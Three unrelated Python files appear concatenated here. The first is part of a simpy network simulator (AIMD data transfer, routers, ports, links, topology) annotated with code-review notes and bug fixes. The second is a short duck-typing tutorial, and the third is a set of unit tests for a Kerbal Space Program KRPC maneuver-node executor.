        """Hook: reset workflow state. No-op in the base class."""
        return
class DataTransfer(WorkFlow):
    """A rate-controlled bulk transfer of ``data_size`` units from src to dst.

    Implements AIMD-like congestion control: while no drops are observed
    the rate grows by a fixed step each RTT; on a drop it is halved.
    NOTE(review): this is Python-2 code (print statements,
    ``dict.values()[0]`` indexing) and will not run unmodified on Python 3.
    """
    def __init__(self,name,src,dst,topology,data_size,max_rate,path=None,increase=None,decrease=None,tick_rtt=False):
        """
        Args:
            name: flow label (also used as packet-name prefix).
            src, dst: endpoint routers; their first port anchors the path.
            topology: owning Topology.
            data_size: total amount of data to deliver.
            max_rate: rate ceiling (per second).
            path: explicit list of ports; shortest path computed if None.
            increase/decrease: optional rate-control callbacks; default
                AIMD handlers are used when None.
            tick_rtt: if True, pace sends per RTT instead of per tick.
        """
        WorkFlow.__init__(self,topology=topology, name=name)
        self.env = self.topology.env
        self.data_size = data_size
        self.path = path
        self.max_rate = max_rate
        self.increase = increase
        self.src = src
        self.dst = dst
        if self.increase == None:
            self.increase = self.increase_default
        self.decrease = decrease
        if self.decrease == None:
            self.decrease = self.decrease_default
        if self.path == None:
            # NOTE(review): ``.values()[0]`` only works on Python 2 dicts.
            src_port = self.src.all_ports.values()[0]
            dst_port = self.dst.all_ports.values()[0]
            g = self.topology.get_graph()
            self.path = nx.shortest_path(g, src_port, dst_port)
            self.graph = g
        self.tick_rtt = tick_rtt
        self.rtt = self.topology.rtt(self.path)
        self.reset()
        self.record_receive = False
        self.record_drop = False
        # Background process that grows the rate once per RTT.
        self.topology.env.process(self.rtt_tick())
    def reset(self):
        """Reset all per-transfer counters and derive per-tick rates."""
        self.received = 0
        self.packet_drop = 0
        self.packet_total = 0
        self.completed = False
        # Additive-increase step: 10% of max_rate, expressed per tick.
        self.increase_step = int(np.ceil(float(self.max_rate) * 0.1 / self.topology.ticks_per_sec))
        self.current_rate = self.increase_step
        self.start_time = self.topology.now()
        self.end_time = 0
        self.receive_data = []
        self.drop_data = []
        # NOTE(review): typo — ``recourd_drop`` is never read anywhere;
        # presumably ``self.record_drop`` (set in __init__) was intended.
        self.recourd_drop = False
        self.congested = False
        self.ticks_per_sec = self.topology.ticks_per_sec
        self.tick_duration = self.topology.tick_millis
        if self.tick_rtt:
            self.tick_duration = self.rtt
            # NOTE(review): divides by the boolean ``tick_rtt`` (always
            # truthy, == 1 here); ``self.rtt`` looks like the intended
            # divisor — confirm.
            self.ticks_per_sec = int(np.ceil(float(1000)/self.tick_rtt))
        self.ticks_per_sec = max (self.ticks_per_sec,1)
        self.tick_duration = max (self.tick_duration, self.topology.tick_millis)
        self.max_rate_per_tick = int(np.ceil(float(self.max_rate) / self.ticks_per_sec))
        self.rate_per_tick = int(np.ceil(float(self.current_rate) / self.ticks_per_sec))
        self.free_packets=[]
    def rtt_tick(self):
        """simpy process: once per RTT, optionally print debug stats and,
        when not congested, invoke the additive-increase handler."""
        last_info = self.topology.now()
        last_receive = self.received
        while True:
            yield self.topology.timeout(self.rtt)
            if self.debug:
                # NOTE(review): ``last_receive`` is a byte counter, not a
                # timestamp, and the bare subtraction below is a no-op —
                # this debug math looks broken (``last_info`` is unused).
                since_last = (self.topology.now() - last_receive) / 1000
                if since_last > 10:
                    since_last - self.topology.now()
                    rate = (self.received - last_receive) / since_last
                    last_receive = self.received
                    percent_received=(float(self.received)/self.data_size)*100
                    print "time:", self.topology.now(),"flow:",self.name,"% received:",percent_received,"speed:",rate
            if self.completed:
                return
            if not self.congested:
                self.increase()
    def increase_default(self):
        """Additive increase: grow rate by one step, capped at max_rate."""
        rate = min (self.current_rate + self.increase_step, self.max_rate)
        if rate != self.current_rate:
            self.current_rate = rate
            self.rate_per_tick = int(np.ceil(float(self.current_rate) / self.ticks_per_sec))
    def decrease_default(self):
        """Multiplicative decrease: halve the rate, floored at one step."""
        rate = max (self.current_rate / 2, self.increase_step)
        if rate != self.current_rate:
            self.current_rate = rate
            self.rate_per_tick = int(np.ceil(float(self.current_rate) / self.ticks_per_sec))
    def computes_stats(self):
        """Compute elapsed seconds and average throughput so far."""
        current_time = self.end_time
        if not self.completed:
            current_time = self.topology.now()
        self.elapse_time = (current_time - self.start_time) / 1000
        self.average = self.data_size / self.elapse_time
    def receive(self,packet):
        """Account a delivered packet; finish the transfer when done."""
        # Recycle the packet object for future sends.
        self.free_packets.append(packet)
        if self.completed:
            return
        self.received += packet.size
        if self.debug: print self.topology.now(),self.name,"packet received",packet.name,packet.size,self.received
        if self.record_receive: self.receive_data.append([self.topology.now(),packet.size*self.topology.ticks_per_sec])
        if (self.received >= self.data_size):
            self.completed = True
            self.end_time = self.topology.now()
            self.computes_stats()
            if self.info: print "time:",self.elapse_time,'secs',self.name,'rtt:', self.rtt,'average',self.average,'drop',self.packet_drop
    def start(self):
        """simpy process: emit one packet per tick until all data is sent."""
        #import pdb; pdb.set_trace()
        self.reset()
        if self.info: print self.topology.now(),"start file transfer",self.name
        self.free_packets=[]
        while not self.completed:
            # Packet size limited by current rate, remaining data, and cap.
            packet_size = min(self.rate_per_tick,self.data_size - self.received, self.max_rate_per_tick)
            packet_name = self.name+"-"+str(self.packet_total + 1)
            packet = None
            if len(self.free_packets) > 0:
                # Reuse a recycled packet instead of allocating a new one.
                packet = self.free_packets[0]
                self.free_packets.remove(packet)
                packet.size = packet_size
                packet.name = packet_name
            else:
                packet = Packet(topology=self.topology, size=packet_size,flow=self,name=packet_name,path=self.path)
            port_in = self.path[0]
            port_in.router.forward(packet=packet, port_in=port_in)
            self.packet_total += 1
            yield self.topology.timeout(self.tick_duration)
    def failed(self, packet,net_elem):
        """Handle a dropped packet: record it and trigger a rate decrease
        (at most one decrease per RTT, via the ``congested`` latch)."""
        if self.completed:
            self.free_packets.append(packet)
            return
        if net_elem != None:
            if self.debug: print self.topology.now(),self.name,"drop packet ",packet.name ,"at",net_elem.name
        else:
            if self.debug: print self.topology.now(),self.name,"drop packet ",packet.name ,'broken link'
        if self.record_drop:
            self.drop_data.append([self.topology.now(),packet.size*self.topology.ticks_per_sec])
        self.packet_drop += 1
        if self.congested:
            # Already backing off; just recycle the packet.
            self.free_packets.append(packet)
            return
        self.congested = True
        self.topology.env.process(self.do_failed(packet))
    def do_failed(self, packet):
        """simpy process: wait one RTT, then decrease rate and clear latch."""
        yield self.topology.timeout(self.rtt)
        self.decrease()
        self.congested = False
        self.free_packets.append(packet)
    def plot_receive(self):
        """Plot recorded receive throughput (requires record_receive=True)."""
        x,y = zip(*self.receive_data)
        plt.plot(x,y,label=self.name)
        plt.plot(x,y)
        plt.xlabel('milliseconds')
        plt.ylabel('Mbps')
    def plot_drop(self):
        """Plot recorded drop events (requires record_drop=True)."""
        x,y = zip(*self.drop_data)
        plt.plot(x,y,label=self.name + "drop")
        plt.xlabel('milliseconds')
        plt.ylabel('Nb of drops')
class Packet:
    """A unit of data travelling along a fixed path of ports.

    ``forward_map`` maps each port name on the path to the next port
    (or None at the destination) so routers can forward in O(1).
    """
    def __init__(self, topology, name, size, flow, forward_map=None, path=None):
        """
        Args:
            topology: owning Topology (provides path helpers and env).
            name: unique packet label (used by __str__/__repr__).
            size: payload size in rate units.
            flow: owning workflow, notified on receive/failure (may be None).
            forward_map: precomputed name -> next-port map; derived from
                ``path`` when omitted.
            path: ordered list of ports; defaults to an empty path.
                BUG FIX: was a mutable default argument ``path=[]`` shared
                across all instances.
        """
        self.topology = topology
        self.env = topology.env
        self.name = name
        self.size = size
        self.path = [] if path is None else path
        self.flow = flow
        if forward_map is not None:
            self.forward_map = forward_map
        else:
            self.forward_map = self.compute_map()

    def compute_map(self, path=None):
        """Build the per-port next-hop map for ``path`` (default: self.path)."""
        forward_map = {}
        if path is None:
            path = self.path
        for port in path:
            if self.topology.is_last_port(current_port=port, path=path):
                forward_map[port.name] = None  # destination reached
            else:
                forward_map[port.name] = self.topology.next_port(current_port=port, path=path)
        return forward_map

    def receive(self):
        """Deliver this packet to its flow."""
        self.flow.receive(self)

    def failed(self, net_elem):
        """Report a drop at ``net_elem`` to the flow, if there is one."""
        if self.flow is not None:
            self.flow.failed(packet=self, net_elem=net_elem)

    def __str__(self):
        return self.name

    def __repr__(self):
        return self.__str__()
class Router:
    """A network node holding ports, with a full-mesh internal fabric.

    Every pair of ports on the same router is connected by a pair of
    zero-latency "fabric" links so packets can cross the router.
    """
    def __init__(self, name, topology=None, capacity=None):
        """
        Args:
            name: router label.
            topology: owning Topology (provides env and registries).
            capacity: default capacity for ports created without one.
        """
        self.topology = topology
        self.env = topology.env
        self.name = name
        self.all_ports = {}     # port name -> Port
        self.fabric_links = {}  # internal link name -> Link
        self.capacity = capacity

    def forward(self, port_in, packet):
        """Send ``packet`` onward from ``port_in`` per its forward_map.

        Delivers to the flow when the map marks this as the last hop;
        drops the packet when there is no link towards the next port.
        """
        next_port = packet.forward_map[port_in.name]
        if next_port is None:
            packet.receive()  # final hop: hand the packet to its flow
            return
        if next_port.name not in port_in.links_out:
            packet.failed(net_elem=port_in)  # no route: drop here
            return
        link = port_in.links_out[next_port.name]
        port_in.send(packet=packet, link_out=link)

    def add_port(self, port=None, name=None, capacity=None):
        """Create (or attach) a port and wire fabric links to every other port.

        Returns the port, or None when no capacity can be determined.
        """
        if port is None:
            if capacity is None:
                if self.capacity is None:
                    print("either the router or the port must have a capacity set to something else than None")
                    return None
                capacity = self.capacity
            port_nb = str(len(self.all_ports) + 1)
            if name is None:
                name = port_nb
            else:
                name = name + ":" + port_nb
            port = Port(name=name, topology=self.topology, capacity=capacity)
        port.router = self
        self.all_ports[port.name] = port
        # Full mesh: connect the new port to every existing port, both ways.
        for p in self.all_ports.values():
            if p == port:
                continue
            link_name_a_b = self.name + ":" + port.name + "->" + self.name + ":" + p.name
            if link_name_a_b not in self.fabric_links:
                link = Link(name=link_name_a_b, capacity=min(port.capacity, p.capacity), latency=0, topology=self.topology)
                # BUG FIX: the original stored ``name`` here instead of the
                # link object (only membership tests hid the bug).
                self.fabric_links[link.name] = link
                port.links_out[p.name] = link
                p.links_in[port.name] = link
                link.port_in = port
                link.port_out = p
                self.topology.all_links[link.name] = link
            link_name_b_a = self.name + ":" + p.name + "->" + self.name + ":" + port.name
            if link_name_b_a not in self.fabric_links:
                link = Link(name=link_name_b_a, capacity=min(port.capacity, p.capacity), latency=0, topology=self.topology)
                # BUG FIX: same wrong-value store as above.
                self.fabric_links[link.name] = link
                p.links_out[port.name] = link
                port.links_in[p.name] = link
                link.port_in = p
                link.port_out = port
                self.topology.all_links[link.name] = link
        return port

    def __str__(self):
        return self.name

    def __repr__(self):
        return self.__str__()
class Port:
    """One attachment point on a router, enforcing a per-tick send budget.

    Packets queued during a tick are released onto their links at the
    start of the next tick; when the tick's budget is exceeded, randomly
    chosen queued packets are dropped until the budget is met again.
    """
    def __init__(self, name, topology, capacity):
        self.topology = topology
        self.env = topology.env
        self.name = name
        self.links_in = {}
        self.links_out = {}
        self.capacity = capacity
        # Budget of data this port may accept per simulation tick.
        self.capacity_per_tick = np.round(self.capacity / self.topology.ticks_per_sec)
        self.router = None
        self.topology.all_ports[self.name] = self
        self.in_flight = 0      # data accepted during the current tick
        self.last_period = 0    # tick at which in_flight was last reset
        self.packets_out = []   # (packet, link) pairs awaiting release

    def send(self, packet, link_out):
        now = self.topology.env.now
        # New tick: flush everything queued last tick onto its link,
        # then start a fresh budget.
        if self.last_period != now:
            self.in_flight = 0
            self.last_period = now
            for queued_packet, queued_link in self.packets_out:
                queued_link.put(queued_packet)
            self.packets_out = []
        self.packets_out.append((packet, link_out))
        self.in_flight += packet.size
        # Over budget: drop random victims until we fit again.
        while self.capacity_per_tick < self.in_flight:
            victim = self.packets_out[np.random.randint(0, len(self.packets_out))]
            self.packets_out.remove(victim)
            self.in_flight -= victim[0].size
            victim[0].failed(net_elem=self)

    def __str__(self):
        return self.name

    def __repr__(self):
        return self.__str__()
class Link:
    """A one-directional connection between two ports, with optional latency.

    Delivery with latency is modelled by a simpy process that waits one
    link latency before handing the packet to the far end.
    """
    def __init__(self, name, topology, latency=0, capacity=0):
        """
        Args:
            name: link label.
            topology: owning Topology (provides env and timeout()).
            latency: one-way delay in simulated milliseconds.
            capacity: simpy Store capacity; 0 means unbounded.
        """
        self.name = name
        self.topology = topology
        self.env = topology.env
        self.latency = latency
        # BUG FIX: the original assigned ``self.capacity = 0``, silently
        # discarding the constructor argument and always taking the
        # unbounded-store branch below.
        self.capacity = capacity
        if self.capacity != 0:
            self.store = simpy.Store(self.env, capacity=self.capacity)
        else:
            self.store = simpy.Store(self.env)
        # NOTE(review): the store is never read in the visible code —
        # put() below bypasses it and delivers directly.
        #self.receive = self.env.process(self.receive())
        self.port_in = None
        self.port_out = None

    def do_latency(self, packet):
        """simpy process: wait one link latency, then deliver the packet."""
        yield self.topology.timeout(self.latency)
        self.receive(packet)

    def put(self, packet):
        """Accept a packet, delivering after ``latency`` ms (immediately if 0)."""
        if (self.latency > 0):
            self.env.process(self.do_latency(packet))
        else:
            self.receive(packet)

    def receive(self, packet):
        """Hand the packet to the router at the far end, or drop it when
        the link is not fully wired up."""
        # NOTE(review): guards on port_in but forwards via port_out —
        # looks intentional (deliver at the far end) but worth confirming.
        if self.port_in is None or self.port_in.router is None:
            packet.failed(net_elem=self)
            return
        self.port_out.router.forward(packet=packet, port_in=self.port_out)

    def __str__(self):
        return self.name
class Endpoint(Router):
    """A leaf node (host): a Router with a single uplink capacity and an
    optional application rate."""
    def __init__(self, name, topology, capacity, rate=0):
        Router.__init__(self, name=name, capacity=capacity, topology=topology)
        self.rate = rate
        self.topology.all_routers[self.name] = self

    def connect(self, router, latency=0):
        """Link this endpoint to ``router`` (a Router or a router name),
        creating the router on demand when the name is unknown."""
        # ``str`` replaces the Python-2-only ``basestring`` check.
        if isinstance(router, str):
            if router in self.topology.all_routers:
                router = self.topology.all_routers[router]
            else:
                # BUG FIX: the original referenced an undefined local
                # ``capacity`` here (NameError); use this endpoint's.
                router = Router(name=router, capacity=self.capacity, topology=self.topology)
                self.topology.all_routers[router.name] = router
        self.topology.add_link(self, router, capacity=self.capacity, latency=latency)

    def __str__(self):
        return self.name
class Topology:
    """Container for the whole simulated network.

    Owns the simpy environment, the registries of routers, ports and
    links, and the mapping between simulated ticks and milliseconds.
    """
    def __init__(self, name="Unknown", env=None, ticks_per_sec=100):
        """
        Args:
            name: topology label.
            env: existing simpy.Environment, or None to create one.
            ticks_per_sec: simulation resolution; one env tick equals
                1000/ticks_per_sec milliseconds.
        """
        self.name = name
        self.all_routers = {}
        self.all_ports = {}
        self.all_links = {}
        self.tick_millis = np.round(1000 / ticks_per_sec)  # ms per tick
        self.ticks_per_sec = ticks_per_sec
        self.env = env
        if self.env is None:
            self.env = simpy.Environment()
        self.workflows = {}

    def get_router(self, name):
        """Return the router registered under ``name``, or None.

        BUG FIX: the original read ``self.routers``, an attribute that
        never exists (the registry is ``self.all_routers``), so every call
        raised AttributeError.
        """
        if name in self.all_routers:
            return self.all_routers[name]
        else:
            return None

    def add_routers(self, routers):
        """Register each router (name or Router instance) in ``routers``."""
        for router in routers:
            self.add_router(router=router)

    def add_links(self, links):
        """Add (router_a, router_b, capacity, latency) tuples as links."""
        for router_a, router_b, capacity, latency in links:
            r_a = self.get_router(router_a)
            if r_a is None:
                print(router_a, "does not exist")
                return None
            r_b = self.get_router(router_b)
            if r_b is None:
                print(router_b, "does not exist")
                return None
            self.add_link(router_a=r_a, router_b=r_b, capacity=capacity, latency=latency)

    def rtt(self, path):
        """Round-trip time (ms) along ``path``: twice the one-way latency sum."""
        latency = 0
        for port in path:
            if self.is_last_port(current_port=port, path=path):
                break
            next_port = self.next_port(current_port=port, path=path)
            link = port.links_out[next_port.name]
            latency += link.latency
        return latency * 2

    def next_port(self, current_port, path):
        """Port after ``current_port`` on ``path`` (None if not on the path)."""
        if current_port not in path:
            return None
        next_port = path[path.index(current_port) + 1]
        return next_port

    def is_last_port(self, current_port, path):
        """True when ``current_port`` is the final hop of ``path``."""
        return path[-1] == current_port

    def add_router(self, router):
        """Register ``router`` (a Router instance or a name to create).

        NOTE(review): when given a Router instance, the else-branch looks
        it up by object in a name-keyed dict — likely a latent KeyError;
        preserved as-is.
        """
        if isinstance(router, str) and router not in self.all_routers:
            router = Router(name=router, topology=self)
        else:
            router = self.all_routers[router]
        router.topology = self
        self.all_routers[router.name] = router

    def add_link(self, router_a, router_b, capacity, latency):
        """Create a bidirectional pair of links between two routers.

        Either argument may be a Router or a name (created on demand).
        """
        if isinstance(router_a, str):
            if router_a in self.all_routers:
                router_a = self.all_routers[router_a]
            else:
                router = Router(name=router_a, capacity=capacity, topology=self)
                self.all_routers[router_a] = router
                router_a = router
        else:
            if router_a.name not in self.all_routers:
                self.all_routers[router_a.name] = router_a
        if isinstance(router_b, str):
            if router_b in self.all_routers:
                router_b = self.all_routers[router_b]
            else:
                router = Router(name=router_b, capacity=capacity, topology=self)
                self.all_routers[router_b] = router
                router_b = router
        else:
            if router_b.name not in self.all_routers:
                self.all_routers[router_b.name] = router_b
        port_a = router_a.add_port(name=router_a.name + "->" + router_b.name, capacity=capacity)
        # BUG FIX: port_b was named "<b>-><b>" (copy-paste); it should
        # point back towards router_a.
        port_b = router_b.add_port(name=router_b.name + "->" + router_a.name, capacity=capacity)
        # BUG FIX: the link names used router_b.name where port_b.name was
        # clearly intended (labels only; no lookup depends on them).
        link_a_b = Link(name=router_a.name + ":" + port_a.name + "->" + router_b.name + ":" + port_b.name, latency=latency, capacity=capacity, topology=self)
        link_b_a = Link(name=router_b.name + ":" + port_b.name + "->" + router_a.name + ":" + port_a.name, latency=latency, capacity=capacity, topology=self)
        port_a.links_out[port_b.name] = link_a_b
        port_b.links_in[port_a.name] = link_a_b
        link_a_b.port_in = port_a
        link_a_b.port_out = port_b
        port_b.links_out[port_a.name] = link_b_a
        port_a.links_in[port_b.name] = link_b_a
        link_b_a.port_in = port_b
        link_b_a.port_out = port_a
        self.all_links[link_a_b.name] = link_a_b
        self.all_links[link_b_a.name] = link_b_a

    def timeout_until_next_sec(self):
        """Timeout event that fires at the next whole simulated second."""
        now = self.env.now * self.tick_millis
        remain = (now / 1000 + 1) * 1000 - now
        return self.timeout(remain)

    def timeout(self, millisecs):
        """Timeout event after ``millisecs``, converted to env ticks."""
        if millisecs < self.tick_millis:
            print("Cannot create timeout of ", millisecs, " because tick time is too long:", self.tick_millis)
            # NOTE(review): passes tick_millis (a ms value) as a tick
            # count; a single tick was probably intended — preserved.
            return self.env.timeout(self.tick_millis)
        return self.env.timeout(millisecs / self.tick_millis)

    def now(self):
        """Current simulated time in milliseconds."""
        return self.env.now * self.tick_millis

    def sim_rate(self):
        """Return (simulated ms elapsed, real s elapsed, sim/real ratio)."""
        real_time_stop = time.time()
        simulated_time_stop = self.now()
        real_time_elapse = real_time_stop - self.real_time_start
        simulated_elapse = simulated_time_stop - self.simulated_time_start
        return simulated_elapse, real_time_elapse, float(simulated_elapse) / (real_time_elapse * 1000)

    def start_simulation(self, until_sec=0, until_millis=0):
        """Run the simulation, optionally bounded in simulated time."""
        duration = 0
        if until_millis > 0:
            duration = until_millis
        if until_sec > 0:
            duration = until_sec * 1000
        duration = np.ceil(duration / self.tick_millis)
        self.real_time_start = time.time()
        self.simulated_time_start = self.now()
        print("Simulation starts", self.now())
        if duration > 0:
            self.env.run(until=self.env.now + duration)
        else:
            self.env.run()
        simulated_elapse, real_time_elapse, rate = self.sim_rate()
        print("Simulation stopped simulated elapse time:", simulated_elapse / 1000, "real time:", real_time_elapse, "real/simulate:", rate)

    def schedule_workflow(self, workflow, when_sec=0, when_millis=0, delay_sec=0, delay_millis=0):
        """Start ``workflow`` as a simpy process.

        BUG FIX: the delay computation read the non-existent attribute
        ``self.when_millis`` (AttributeError); it now uses the argument.
        NOTE(review): the computed ``timeout`` is never awaited, so the
        workflow actually starts immediately regardless of any delay —
        preserved as-is.
        """
        timeout = None
        if when_sec > 0:
            when_millis = when_sec * 1000
        if when_millis > 0:
            if when_millis < self.now():
                print("Cannot schedule workflow in the past")
                return
            delay_millis = when_millis - self.now()
        else:
            if delay_sec > 0:
                delay_millis = delay_sec * 1000
        if delay_millis > 0:
            timeout = self.timeout(delay_millis)
        p = self.env.process(workflow.start())
        workflow.main_process = p
        self.workflows[workflow.name] = workflow

    def get_graph(self):
        """Build an undirected networkx graph of ports joined by links."""
        graph = nx.Graph()
        for link in self.all_links.values():
            port_a = link.port_in
            port_b = link.port_out
            graph.add_edge(port_a, port_b)
        return graph

    def draw(self):
        """Render the topology with matplotlib."""
        graph = self.get_graph()
        pos = nx.spring_layout(graph)
        nx.draw_networkx_edges(graph, pos)
        nx.draw_networkx_nodes(graph, pos, node_size=100, alpha=0.5, color='b')
        nx.draw_networkx_labels(graph, pos, font_size=8, font_family='sans-serif')
        plt.axis('off')
        plt.show()

    def show_plots(self):
        """Show all pending matplotlib plots with a legend."""
        plt.legend()
        plt.show()
|
'''
Python has something called "duck typing". It's not special, but the idea is
"If it walks like a duck and quacks like a duck, it's a duck"
Because nothing is strongly typed (like C, C++, C#, Java) you can pass anything
anywhere you want.
This is super flexible for developers, but it's also sometimes difficult to figure out
what you should be passing along.
For flexibility, see the example below. If you want to understand classes, see classes.py
first.
We will create two different classes of different types, then call a function on those
interfaces... and they both will work.
'''
class Orange:
    """A fruit whose only attribute is its color."""

    def __init__(self):
        self.color = "orange"
class Elephant:
    """An animal whose only attribute is its color."""

    def __init__(self):
        self.color = "gray"
# Now we'll iterate over a list containing one instance of each class and
# read the attribute "color". Since both classes have a "color" attribute
# this works — duck typing in action.
object_list = [Orange(), Elephant()]
for obj in object_list:
    print("Type = ", type(obj), " Color = ", obj.color)
|
"""
Unit test the NodeExecutor class.
Full coverage achieved, refactoring for readability & efficiency ongoing.
"""
import unittest
from unittest.mock import patch, call
from collections import namedtuple
import sys
from NodeExecutor import NodeExecutor
class Test_environment(unittest.TestCase):
    """Verify the interpreter matches what production expects."""

    def test_python_version(self):
        """The major Python version must be at least 3."""
        major_version = sys.version_info[0]
        self.assertGreaterEqual(major_version, 3)
class Test_NodeExecutor_init(unittest.TestCase):
    """
    Test the NodeExecutor class __init__ method.
    Requires a patch on the KRPC server connection for:
        - active vessel
    """

    def test_no_krpc_connection(self):
        """Server unreachable should raise ConnectionRefusedError."""
        # BUG FIX: the original try/except/return pattern passed silently
        # when no exception was raised at all; assertRaises enforces it.
        with self.assertRaises(ConnectionRefusedError):
            NodeExecutor()

    @patch('krpc.connect', spec=True)
    def test_krpc_connection(self, mock_conn):
        """Check that __init__ connects to KRPC server."""
        NodeExecutor()
        mock_conn.assert_called_once_with(name='NodeExecutor')

    @patch('krpc.connect', spec=True)
    def test_init_minimum_burn_duration_no_karg(self, mock_conn):
        """Check that __init__ w/o karg sets minimum_burn_duration to 4."""
        Hal9000 = NodeExecutor()
        self.assertEqual(Hal9000.minimum_burn_duration, 4)

    @patch('krpc.connect', spec=True)
    def test_init_minimum_burn_duration(self, mock_conn):
        """Check that __init__ with minimum_burn_duration karg sets it."""
        Hal9000 = NodeExecutor(minimum_burn_duration=10)
        self.assertEqual(Hal9000.minimum_burn_duration, 10)

    @patch('krpc.connect', spec=True)
    def test_init_minimum_burn_duration_negative_value(self, mock_conn):
        """Negative value for karg should raise AssertionError."""
        # BUG FIX: same silent-pass pattern as above.
        with self.assertRaises(AssertionError):
            NodeExecutor(minimum_burn_duration=-10)
@patch('krpc.connect', spec=True)
class Test_NodeExecutor_ro_attributes(unittest.TestCase):
    """
    Test the NodeExecutor class read-only attributes.
    Requires a patch on the KRPC server connection for:
        - active vessel
    """
    def setUp(self):
        """Set up the mock objects."""
        # Lightweight stand-in for a KRPC maneuver node.
        node = namedtuple('node', 'delta_v ut')
        self.NODE0 = node(delta_v=10, ut=20)
        self.NODE1 = node(delta_v=30, ut=40)
        # Attribute sets applied to the mocked KRPC connection.
        self.CONN_ATTR0 = {
            'space_center.active_vessel.control.nodes': (self.NODE0,
                                                         self.NODE1),
            'space_center.active_vessel.available_thrust': 100,
            'space_center.active_vessel.specific_impulse': 200,
            'space_center.active_vessel.mass': 300,
            'space_center.ut': 1980}
        self.CONN_ATTR1 = {
            'space_center.active_vessel.control.nodes': (self.NODE1,),
            'space_center.active_vessel.available_thrust': 200000,
            'space_center.active_vessel.specific_impulse': 800,
            'space_center.active_vessel.mass': 40000000,
            'space_center.ut': 1980}
        # Expected burn times for the two attribute sets above.
        self.burn_duration0 = 29.9
        self.burn_duration1 = 5988.6
    def tearDown(self):
        """Delete the mock objects."""
        del(self.NODE0)
        del(self.NODE1)
        del(self.CONN_ATTR0)
        del(self.CONN_ATTR1)
        del(self.burn_duration0)
        del(self.burn_duration1)
    def test_node(self, mock_conn):
        """Check that node is the first node from active vessel."""
        control = mock_conn().space_center.active_vessel.control
        with self.subTest('zero nodes'):
            control.nodes = ()
            Hal9000 = NodeExecutor()
            self.assertEqual(Hal9000.node, None)
        with self.subTest('one node'):
            control.nodes = (self.NODE0,)
            Hal9000 = NodeExecutor()
            self.assertEqual(Hal9000.node, self.NODE0)
        with self.subTest('two nodes'):
            control.nodes = (self.NODE0, self.NODE1)
            Hal9000 = NodeExecutor()
            self.assertEqual(Hal9000.node, self.NODE0)
    def test_has_node(self, mock_conn):
        """Active vessel without nodes should set has_node to False."""
        control = mock_conn().space_center.active_vessel.control
        with self.subTest('zero nodes'):
            control.nodes = ()
            Hal9000 = NodeExecutor()
            self.assertEqual(Hal9000.has_node, False)
        with self.subTest('one node'):
            control.nodes = (self.NODE0,)
            Hal9000 = NodeExecutor()
            self.assertEqual(Hal9000.has_node, True)
        with self.subTest('two nodes'):
            control.nodes = (self.NODE0, self.NODE1)
            Hal9000 = NodeExecutor()
            self.assertEqual(Hal9000.has_node, True)
    def test_delta_v(self, mock_conn):
        """Check that delta_v is set from the node."""
        mock_conn().configure_mock(**self.CONN_ATTR0)
        Hal9000 = NodeExecutor()
        self.assertEqual(Hal9000.delta_v, self.NODE0.delta_v)
    def test_burn_duration_at_max_thrust(self, mock_conn):
        """Node should set burn_duration_at_max_thrust."""
        with self.subTest('first set of values'):
            mock_conn().configure_mock(**self.CONN_ATTR0)
            Hal9000 = NodeExecutor()
            self.assertAlmostEqual(Hal9000.burn_duration_at_max_thrust,
                                   self.burn_duration0, 1)
        with self.subTest('second set of values'):
            mock_conn().configure_mock(**self.CONN_ATTR1)
            Hal9000 = NodeExecutor()
            self.assertAlmostEqual(Hal9000.burn_duration_at_max_thrust,
                                   self.burn_duration1, 1)
    def test_maximum_throttle_and_burn_duration(self, mock_conn):
        """Setting minimum_burn_duration should set burn throttle, duration."""
        mock_conn().configure_mock(**self.CONN_ATTR0)
        with self.subTest('burn time greater than minimum'):
            Hal9000 = NodeExecutor(minimum_burn_duration=self.burn_duration0/2)
            self.assertEqual(Hal9000.maximum_throttle, 1)
            self.assertEqual(Hal9000.burn_duration,
                             Hal9000.burn_duration_at_max_thrust)
        with self.subTest('no minimum'):
            Hal9000 = NodeExecutor(minimum_burn_duration=0)
            self.assertEqual(Hal9000.maximum_throttle, 1)
            self.assertAlmostEqual(Hal9000.burn_duration,
                                   Hal9000.burn_duration_at_max_thrust)
        with self.subTest('burn time less than minimum'):
            # A burn stretched to 2x its natural length needs ~half throttle.
            Hal9000 = NodeExecutor(minimum_burn_duration=self.burn_duration0*2)
            self.assertAlmostEqual(Hal9000.maximum_throttle, 0.5, 3)
            self.assertEqual(Hal9000.burn_duration,
                             Hal9000.minimum_burn_duration)
    def test_burn_ut(self, mock_conn):
        """Check that burn_ut is set properly."""
        # The burn starts half its duration before the node's time.
        mock_conn().configure_mock(**self.CONN_ATTR0)
        Hal9000 = NodeExecutor()
        self.assertAlmostEqual(
            Hal9000.burn_ut, self.NODE0.ut - Hal9000.burn_duration/2)
@patch('krpc.connect', spec=True)
class Test_NodeExecutor_methods(unittest.TestCase):
    """
    Test the NodeExecutor public methods.
    Requires a patch on the KRPC server connection for:
        - active vessel
    """
    def setUp(self):
        """Set up the mock objects."""
        # Stand-in maneuver node, including the reference frame and the
        # remaining delta-v used by the burn methods.
        node = namedtuple(
            'node', 'delta_v ut reference_frame remaining_delta_v')
        self.NODE0 = node(delta_v=10, ut=2000,
                          reference_frame='RF', remaining_delta_v=0.1)
        self.CONN_ATTRS = {
            'space_center.active_vessel.control.nodes': (self.NODE0,),
            'space_center.active_vessel.available_thrust': 100,
            'space_center.active_vessel.specific_impulse': 200,
            'space_center.active_vessel.mass': 30,
            'space_center.ut': 1980}
    def tearDown(self):
        """Delete the mock objects."""
        del(self.NODE0)
        del(self.CONN_ATTRS)
    @patch('NodeExecutor.time', spec=True)
    @patch('sys.stdout', spec=True)
    def test_align_to_burn(self, mock_stdout, mock_time, mock_conn):
        """Check that align_to_burn sets up and engages the autopilot."""
        mock_conn().configure_mock(**self.CONN_ATTRS)
        Hal9000 = NodeExecutor()
        auto_pilot = mock_conn().space_center.active_vessel.auto_pilot
        Hal9000.align_to_burn()
        with self.subTest('sets the auto_pilot attributes'):
            actual_ref = auto_pilot.reference_frame
            actual_dir = auto_pilot.target_direction
            actual_rol = auto_pilot.target_roll
            self.assertEqual(actual_ref, self.NODE0.reference_frame)
            self.assertEqual(actual_dir, (0, 1, 0))
            # NaN is the only value not equal to itself.
            self.assertNotEqual(actual_rol, actual_rol, 'Expected NaN')
        with self.subTest('engages auto_pilot & waits for alignment'):
            CONN_CALLS = [call.engage(), call.wait()]
            auto_pilot.assert_has_calls(CONN_CALLS)
        with self.subTest('writes message to stdout'):
            T0 = self.NODE0.ut - self.CONN_ATTRS['space_center.ut']
            STDOUT_CALLS = [call(f'Aligning at T0-{T0:.0f} seconds')]
            mock_stdout.write.assert_has_calls(STDOUT_CALLS)
